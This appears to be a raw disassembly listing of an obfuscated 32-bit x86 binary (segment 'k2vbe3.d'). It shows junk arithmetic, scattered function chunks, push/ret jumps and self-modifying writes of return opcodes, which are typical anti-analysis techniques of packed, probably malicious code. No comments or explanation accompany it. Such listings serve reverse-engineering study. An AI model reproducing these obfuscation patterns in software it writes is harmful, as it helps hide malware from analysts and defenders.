; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_43DDF6:				; CODE XREF: sub_43F7AC:loc_443AC3j
		jmp	loc_451175
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_4438F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451214

loc_43DE01:				; CODE XREF: sub_451214:loc_451648j
		push	5A22FE29h
		pop	ebx
		and	ebx, 3F06D7DDh
		sub	ebx, 2D99A69Bh
		xor	ebx, 1C6C18Dh
		push	offset loc_44E70C
		jmp	nullsub_113
; END OF FUNCTION CHUNK	FOR sub_451214
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_43DE23:				; CODE XREF: sub_44BDBB:loc_45420Fj
		sub	edx, 0B0565F3Dh
		and	edx, 9BD3F08Fh
		xor	edx, 4DCF2814h
		add	edx, ebp
		add	edx, 0A2F0F7E6h
		mov	edx, [edx]
		push	offset sub_450983
		jmp	loc_457C9F
; END OF FUNCTION CHUNK	FOR sub_44BDBB

; =============== S U B	R O U T	I N E =======================================



sub_43DE49	proc near		; CODE XREF: k2vbe3.d:004416FAp
					; k2vbe3.d:0044A898j

; FUNCTION CHUNK AT 0045C1C9 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		lea	eax, nullsub_250
		mov	byte ptr [eax],	0C3h
		jmp	loc_45C1C9
sub_43DE49	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	eax, [esp]
		jmp	loc_43D8E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_43DE63:				; CODE XREF: sub_443F0D+426Dj
		mov	edx, esp
		push	edx
		push	0
		push	esi
		mov	esi, eax
		jmp	loc_44962F
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------

loc_43DE70:				; CODE XREF: k2vbe3.d:00452E29j
		and	ebx, 7D44E628h
		add	ebx, 0F2FD8188h
		mov	[ebx], eax
		push	offset sub_44DE63
		jmp	locret_445305
; ---------------------------------------------------------------------------

loc_43DE88:				; CODE XREF: k2vbe3.d:0045B3E9j
		jz	loc_44968B
		jmp	loc_455EB2
; ---------------------------------------------------------------------------
		pop	edi
		jmp	sub_45AA63
; ---------------------------------------------------------------------------

loc_43DE99:				; CODE XREF: k2vbe3.d:004569C5j
		js	loc_45B22B

loc_43DE9F:				; CODE XREF: k2vbe3.d:004569BDj
		xor	eax, 47340651h
		call	sub_4553CC
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_43DEAA:				; CODE XREF: sub_451CF1:loc_444111j
		mov	ds:dword_41E0F0, eax
		lea	eax, nullsub_465
		mov	byte ptr [eax],	0C3h
		jmp	loc_4482DC
; END OF FUNCTION CHUNK	FOR sub_451CF1

; =============== S U B	R O U T	I N E =======================================



sub_43DEBE	proc near		; CODE XREF: sub_4033CB+E0p
					; sub_404C4E+FCp ...

; FUNCTION CHUNK AT 0043C39A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FFA8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004402C6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00440D02 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00443CCB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004446E6 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004460A1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447497 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044855A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044B705 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C44E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044CA00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E77E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EBB1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004500A2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004505D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451B03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045327E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00453EBB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B5D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457709 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045BC04 SIZE 0000000B BYTES

		jno	loc_44855A
		jmp	loc_45327E
sub_43DEBE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454BF9

loc_43DEC9:				; CODE XREF: sub_454BF9+18j
		call	sub_4586FE
; END OF FUNCTION CHUNK	FOR sub_454BF9
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_43DECE:				; CODE XREF: sub_4426DF+4AF8j
		jmp	nullsub_43
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449774

loc_43DED3:				; CODE XREF: sub_449774+5DEj
		jnz	loc_43DBB3
		xchg	edx, [ebp+0]
		jmp	sub_43DBA5
; END OF FUNCTION CHUNK	FOR sub_449774
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453FF1

loc_43DEE1:				; CODE XREF: sub_453FF1+Aj
		mov	byte ptr [ebp-1], 0
		mov	eax, cs
		xor	al, al
		or	eax, eax
		jnz	loc_456185
		jmp	loc_440753
; END OF FUNCTION CHUNK	FOR sub_453FF1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_139. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_43DEF7:				; CODE XREF: sub_456666-AA6Cj
		jmp	nullsub_350
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------

loc_43DEFC:				; CODE XREF: k2vbe3.d:00455732j
		shr	ecx, 3

; =============== S U B	R O U T	I N E =======================================



sub_43DEFF	proc near		; CODE XREF: sub_45BE94-15817p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00446C15 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044C20E SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	eax
		push	edx

loc_43DF05:				; CODE XREF: sub_44B8EF-A48Fj
		mov	edx, ecx
		xchg	edx, [esp+4+var_4]
		push	1AF5EBBCh
		jmp	loc_44C20E
sub_43DEFF	endp

; ---------------------------------------------------------------------------

loc_43DF14:				; CODE XREF: k2vbe3.d:0044070Dj
		jnp	loc_43C49C

; =============== S U B	R O U T	I N E =======================================



sub_43DF1A	proc near		; CODE XREF: sub_440F92+1165Ep

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004426A6 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	[edi], eax
		xchg	ebx, [esp-4+arg_0]
		mov	edi, ebx
		push	offset sub_45BB12
		jmp	loc_4426A6
sub_43DF1A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_43DF2F:				; CODE XREF: sub_44A6BD:loc_43F4F9j
		mov	eax, [ebp-14h]
		push	edi
		mov	edi, eax
		xchg	edi, [esp+8+var_8]
		push	ebx
		push	220618D9h
		jmp	loc_447316
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------

loc_43DF43:				; CODE XREF: k2vbe3.d:00454295j
		jno	nullsub_97
		cmp	ecx, edi
		jmp	loc_458A0C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527C2

loc_43DF50:				; CODE XREF: sub_4527C2:loc_45B11Dj
		push	0EDA04558h

loc_43DF55:				; CODE XREF: k2vbe3.d:loc_44EDCCj
		xchg	edi, [esp+4+var_4]
		mov	ebx, edi
		pop	edi
		xor	ebx, 0A5F8B855h
; END OF FUNCTION CHUNK	FOR sub_4527C2
; START	OF FUNCTION CHUNK FOR sub_450983

loc_43DF61:				; CODE XREF: sub_450983-1434Aj
		cmp	ebx, 1FCC996Ch
		jmp	loc_43CF7E
; END OF FUNCTION CHUNK	FOR sub_450983
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A252

loc_43DF6C:				; CODE XREF: sub_45A252:loc_446C97j
		sbb	edx, eax
		jmp	loc_44B281
; END OF FUNCTION CHUNK	FOR sub_45A252
; ---------------------------------------------------------------------------

loc_43DF73:				; CODE XREF: k2vbe3.d:00446B35j
		mov	esi, ecx
		not	eax
; START	OF FUNCTION CHUNK FOR sub_456666

loc_43DF77:				; CODE XREF: sub_456666:loc_446B23j
		and	ecx, 0E0D0BB36h
		add	ecx, 8C440AFEh
		add	ecx, ebp
		add	ecx, 52FBBAC4h
		mov	ecx, [ecx]
		jmp	loc_448277
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------

loc_43DF92:				; CODE XREF: k2vbe3.d:00449D35j
		mov	[edi], ebp
		sbb	eax, 4A964EE9h
		jge	loc_4567CB
		xchg	edx, [edi]
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_43DFA2:				; CODE XREF: sub_443FC1:loc_449D1Fj
		add	esi, 26AA628Ah
		mov	[esi], eax
		jmp	loc_4411C5
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_43DFAF:				; CODE XREF: sub_44B979+F8FDj
		or	eax, 27B345F6h
		sub	eax, 9081537Ch
		xor	eax, 6781C954h
		js	loc_4463A9

loc_43DFC7:				; CODE XREF: k2vbe3.d:0044D67Aj
		jmp	loc_459133
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------

loc_43DFCC:				; CODE XREF: k2vbe3.d:0044BD88j
		jmp	loc_4597A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_43DFD1:				; CODE XREF: sub_44B979+1Bj
		jmp	loc_44D68F
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_43DFD6:				; CODE XREF: sub_450F71-49C7j
		jl	loc_453689
		jmp	loc_443D97
; END OF FUNCTION CHUNK	FOR sub_450F71

; =============== S U B	R O U T	I N E =======================================



sub_43DFE1	proc near		; DATA XREF: sub_440EE3-3AD3o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C3D5 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043C99F SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043DCB9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043F6CB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00440327 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004409AC SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044103A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442CFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442D56 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00443FF1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00444646 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044477B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444BFD SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044607F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004477C9 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00447A2C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004498E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449A38 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044A0E7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A2BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A35F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AF31 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044B388 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044BA39 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C0F2 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044C3A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F742 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044F97F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004513AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453C90 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00456412 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456550 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004585B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459EC1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459EDC SIZE 00000009 BYTES

		push	0BDB10903h
		pop	edi
		add	edi, 0B5F8FAFEh
		jnz	loc_444BFD
		add	edi, esi
		cmp	ebx, edx
		jmp	loc_44BA39
sub_43DFE1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A39

loc_43DFFC:				; CODE XREF: sub_451A39:loc_44BD6Bj
		pop	eax
		xor	eax, 2FBFF145h
		test	eax, 2
		jmp	loc_4473FA
; END OF FUNCTION CHUNK	FOR sub_451A39
; ---------------------------------------------------------------------------

loc_43E00E:				; CODE XREF: k2vbe3.d:loc_442A50j
		pop	eax
		add	eax, 5DA62922h
		test	eax, 1000000h
		jmp	loc_4491DB
; ---------------------------------------------------------------------------

loc_43E020:				; CODE XREF: k2vbe3.d:00458615j
		jno	loc_4503FE

; =============== S U B	R O U T	I N E =======================================



sub_43E026	proc near		; CODE XREF: k2vbe3.d:00446AB1p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [eax],	0C3h
		jmp	sub_4526F4
sub_43E026	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4526F4

loc_43E032:				; CODE XREF: sub_4526F4j
		push	offset sub_44AA71
		jmp	loc_444FC8
; END OF FUNCTION CHUNK	FOR sub_4526F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437D3

loc_43E03C:				; CODE XREF: sub_4437D3:loc_44D971j
		push	offset sub_455B26
		jmp	loc_44329B
; END OF FUNCTION CHUNK	FOR sub_4437D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_43E046:				; CODE XREF: sub_44469A:loc_44A23Ej
					; sub_44469A+5BAEj
		add	ecx, 4DBDACD7h
		sub	ecx, 0B4EEA612h
		cmp	ecx, 0CD0EE9F1h
		jmp	loc_4594B9
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4454EF

loc_43E05D:				; CODE XREF: sub_4454EF:loc_456C6Aj
		add	eax, 0EE3F7FF3h
		add	eax, ebp
		add	eax, 0E26CD003h
		mov	dword ptr [eax], 646E6957h
		push	0F2059FEh
		jmp	loc_4404E5
; END OF FUNCTION CHUNK	FOR sub_4454EF
; ---------------------------------------------------------------------------

loc_43E07B:				; CODE XREF: k2vbe3.d:loc_451DB8j
		cmp	edx, ecx
		jmp	loc_455E26
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_134. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_43E083:				; CODE XREF: sub_44083C+C0BAj
		push	offset loc_453385
		jmp	nullsub_199
; END OF FUNCTION CHUNK	FOR sub_44083C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EABB

loc_43E08D:				; CODE XREF: sub_44EABB:loc_44222Aj
		add	ecx, 0E1F6CB3Ah
		popf
		xchg	ecx, [esp+0]
		jmp	sub_44BA05
; END OF FUNCTION CHUNK	FOR sub_44EABB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445541

loc_43E09C:				; CODE XREF: sub_445541:loc_449680j
		xchg	eax, [esp+4+var_4]
		jmp	sub_45AA40
; END OF FUNCTION CHUNK	FOR sub_445541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_43E0A4:				; CODE XREF: sub_454E69:loc_44DA80j
					; sub_454E69-73CEj
		or	edi, 0F66F4726h
		add	edi, 9D4BBD5h
		xchg	edi, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
		ja	loc_447255
		jmp	loc_44A050
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_43E0C3:				; CODE XREF: sub_457DCA:loc_453DF2j
		call	sub_44314D
; END OF FUNCTION CHUNK	FOR sub_457DCA
; START	OF FUNCTION CHUNK FOR sub_44AD44

loc_43E0C8:				; CODE XREF: k2vbe3.d:loc_43E7D5j
					; sub_44AD44+2080j
		jmp	nullsub_78
; END OF FUNCTION CHUNK	FOR sub_44AD44
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B194

loc_43E0CD:				; CODE XREF: sub_44B194+16j
		jmp	sub_455CC3
; END OF FUNCTION CHUNK	FOR sub_44B194
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_43E0D2:				; CODE XREF: sub_44A6BD:loc_441768j
		xor	edx, ds:4000E9h
		rol	edx, 1Bh
		call	sub_456849

loc_43E0E0:				; CODE XREF: sub_44F49C+4AA8j
		jmp	nullsub_397
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------

loc_43E0E5:				; CODE XREF: k2vbe3.d:0044FA08j
		jmp	locret_44E6DB
; ---------------------------------------------------------------------------
		mov	[ecx], eax
		ror	ebx, 13h
		jmp	sub_43DA1E
; ---------------------------------------------------------------------------
		retn

; =============== S U B	R O U T	I N E =======================================



sub_43E0F5	proc near		; CODE XREF: sub_440C94:loc_43F33Dj
					; sub_44921C:loc_442755j ...
		jo	sub_451AEE
		push	ebp
		call	sub_44B208
sub_43E0F5	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4507E3

loc_43E101:				; CODE XREF: sub_4507E3-12B2Fj
		jmp	sub_44E481
; END OF FUNCTION CHUNK	FOR sub_4507E3
; ---------------------------------------------------------------------------
		pop	ecx

; =============== S U B	R O U T	I N E =======================================



sub_43E107	proc near		; CODE XREF: sub_444BD5+1p

; FUNCTION CHUNK AT 00453EA9 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	3266E9C4h
		pop	edi
		jmp	loc_453EA9
sub_43E107	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		adc	esi, edx
		test	edi, 899D9309h
		jmp	loc_442A27
; ---------------------------------------------------------------------------

loc_43E123:				; CODE XREF: k2vbe3.d:004559A4j
		call	sub_43DCD0
		cdq
		jmp	loc_4530D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440543

loc_43E12E:				; CODE XREF: sub_440543:loc_44D813j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_440543
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_43E130:				; CODE XREF: sub_44F20A+3ECAj
		jmp	loc_4585C1
; END OF FUNCTION CHUNK	FOR sub_44F20A

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43E135	proc near		; CODE XREF: k2vbe3.d:loc_43C0E3p
					; sub_441418+6p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C580 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F547 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004403A6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044044D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441FFB SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00442982 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443F08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B5D6 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F8B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450377 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451F5C SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00452DBD SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00454EA4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00455F33 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00459956 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459F2A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C344 SIZE 0000000D BYTES

		push	ebp
		mov	ebp, esp
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+4+var_4]
		mov	[ebp+var_4], eax
		jmp	loc_443F08
sub_43E135	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43E146:				; CODE XREF: k2vbe3.d:004449CEj
		push	4CDBDA77h
		pop	edx
		add	edx, 8340D3D2h
		sub	edx, 2EA3B998h
		xor	edx, 7A547E41h
		js	loc_453FDB
		jo	loc_444EC5
		jo	loc_43CC93
		jmp	loc_453FDB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_43E175:				; CODE XREF: sub_43FF59+1116Aj
		jno	loc_44362D
		add	ebp, 9D3EBE91h
		jmp	loc_4463D1
; END OF FUNCTION CHUNK	FOR sub_43FF59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44249A

loc_43E186:				; CODE XREF: sub_44249A:loc_43C52Ej
		sub	esi, 0D817734Fh
		and	esi, 0F5105740h
		rol	esi, 0Bh
		add	esi, 6DE92D94h
		add	esi, ebp
		add	esi, 91E6D058h
		jmp	loc_4567F5
; END OF FUNCTION CHUNK	FOR sub_44249A
; ---------------------------------------------------------------------------

loc_43E1A8:				; CODE XREF: k2vbe3.d:0043FC20j
		ja	loc_45022A
		sub	ebx, 0BE49B635h
		add	edi, ebx
		jmp	loc_43CD11
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_43E1BB:				; CODE XREF: sub_4582DD:loc_4511ACj
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44C7F8
		jmp	loc_4558E3
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
		push	esi
		jmp	loc_443168
; ---------------------------------------------------------------------------

loc_43E1D0:				; CODE XREF: k2vbe3.d:0044823Aj
		ja	loc_4494D2
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_43E1D6:				; CODE XREF: sub_44660F+11j
		add	ecx, 832ACA7Ah
		and	ecx, 0AFE33BB9h
		rol	ecx, 9
		add	ecx, 7A57A8EFh
		add	ecx, ebp
		add	ecx, 818433C9h
		mov	[ecx], eax
		jmp	loc_4583DB
; END OF FUNCTION CHUNK	FOR sub_44660F

; =============== S U B	R O U T	I N E =======================================



sub_43E1FA	proc near		; CODE XREF: k2vbe3.d:loc_442936p
					; k2vbe3.d:00453F9Fj
		xchg	ebx, [esp+0]
		pop	ebx
sub_43E1FA	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_43E1FE:				; CODE XREF: sub_43C82E:loc_448DACj
		call	sub_43E204
		retn
; END OF FUNCTION CHUNK	FOR sub_43C82E

; =============== S U B	R O U T	I N E =======================================



sub_43E204	proc near		; CODE XREF: sub_43C82E:loc_43E1FEp
					; k2vbe3.d:loc_44EA02p

var_4		= dword	ptr -4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043C3C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F5BF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00440D24 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004418F5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00441E61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044839B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD05 SIZE 00000005 BYTES

		call	sub_43F7AC
		jb	loc_4418F5
		push	ebp
		mov	ebp, ecx
		jmp	loc_44BD05
sub_43E204	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_43E217:				; CODE XREF: sub_43C82E+5C5Ej
		jnz	loc_454822
		jmp	loc_43F31C
; END OF FUNCTION CHUNK	FOR sub_43C82E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459DA3

loc_43E222:				; CODE XREF: sub_459DA3-18AD5j
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	ebx, [esp+4+var_4]
		mov	ebp, ebx
		pop	ebx
		jmp	loc_457189
; END OF FUNCTION CHUNK	FOR sub_459DA3
; ---------------------------------------------------------------------------

locret_43E232:				; CODE XREF: k2vbe3.d:loc_45B0FAj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_43E233:				; CODE XREF: sub_441D41+16156j
		jmp	nullsub_440
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_43E238:				; CODE XREF: sub_449372+6D44j
		jmp	loc_45902A
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_43E23D:				; CODE XREF: sub_45AA25-1BFACj
					; sub_446E24:loc_443E4Fj
		lea	eax, [ebp-26Fh]
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44DE55
		jmp	loc_44FA3B
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43E254:				; CODE XREF: sub_45A323-10C2Ej
		jge	loc_44A76A
; END OF FUNCTION CHUNK	FOR sub_45A323
; START	OF FUNCTION CHUNK FOR sub_4590BA

loc_43E25A:				; CODE XREF: sub_4590BA+21j
		jmp	loc_452201
; END OF FUNCTION CHUNK	FOR sub_4590BA
; ---------------------------------------------------------------------------
		mov	eax, [ebx]
		xor	ebx, ebp
		jmp	loc_44A76A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_252. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F364

loc_43E269:				; CODE XREF: sub_43F364+B9AFj
		jmp	loc_4429DB
; END OF FUNCTION CHUNK	FOR sub_43F364
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_43E26E:				; CODE XREF: sub_457D4B-F09Fj
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44498A

loc_43E273:				; CODE XREF: sub_44498A+2072j
		jmp	loc_457071
; END OF FUNCTION CHUNK	FOR sub_44498A
; ---------------------------------------------------------------------------

loc_43E278:				; CODE XREF: k2vbe3.d:0043C1EAj
		jmp	loc_446FA1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_43E27D:				; CODE XREF: sub_4468FE-9D9Fj
		rol	eax, 0Ch
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4468FE

; =============== S U B	R O U T	I N E =======================================



sub_43E282	proc near		; CODE XREF: sub_45A634-1D7BAp
					; sub_44BAE4:loc_4450BBj ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441B8F SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00455D1B SIZE 00000005 BYTES

		jns	sub_442700
		push	esi
		mov	esi, ebp
		jmp	loc_455D1B
sub_43E282	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_43E290:				; CODE XREF: k2vbe3.d:loc_44B58Aj
					; sub_4506C3+1F45j
		xchg	ecx, ebp
		jmp	loc_44D737
; END OF FUNCTION CHUNK	FOR sub_4506C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EDD

loc_43E297:				; CODE XREF: sub_454EDD-12410j
		add	eax, edi
		pop	edi
		cmp	eax, [ebp-10h]
		jbe	loc_455177
		jmp	loc_44D666
; END OF FUNCTION CHUNK	FOR sub_454EDD
; ---------------------------------------------------------------------------

loc_43E2A8:				; CODE XREF: k2vbe3.d:0045A4FDj
		xchg	ebp, [edx]
		mov	esi, 53ADA7A2h
		jmp	loc_45B067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_43E2B4:				; CODE XREF: sub_44ED3C:loc_456320j
		add	edx, ebp
		add	edx, 2AA82C7Ah
		mov	[edx], eax
		pop	edx
		push	offset sub_453F17
		jmp	loc_444BE5
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_43E2C9:				; CODE XREF: sub_451EEA+14j
		pop	esi

loc_43E2CA:				; CODE XREF: k2vbe3.d:00459A3Dj
		cmp	dword ptr [ebp-4], 0
		jz	loc_446C00
		jmp	loc_459D85
; END OF FUNCTION CHUNK	FOR sub_451EEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F6E

loc_43E2D9:				; CODE XREF: sub_445F6E:loc_45B1EEj
		add	eax, [ebp-4]
		push	ecx
		push	0B99FF182h
		pop	ecx
